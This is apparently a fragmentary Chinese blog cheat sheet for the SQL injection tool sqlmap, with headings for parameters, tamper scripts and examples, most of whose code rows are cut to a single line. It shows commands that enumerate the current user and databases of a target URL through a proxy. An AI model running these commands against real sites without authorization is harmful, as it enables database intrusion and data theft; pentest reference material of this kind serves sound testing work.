无标题
Sqlmap
常用参数
1 | --version #显示程序的版本号并退出 |
tamper脚本
1 | # 使用方法--tamper xxx.py |
使用实例
1 | 1、判断注入点和数据类型: |
进阶使用
1 | sqlmap -u "http://url/news?id=1" --current-user #获取当前用户名称 |
直接使用
1 | python sqlmap.py -u "https://www.vuln.cn/post.php?id=1" --force-ssl --proxy "http://127.0.0.1:7890" --batch --dbs |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Pocon's Blog!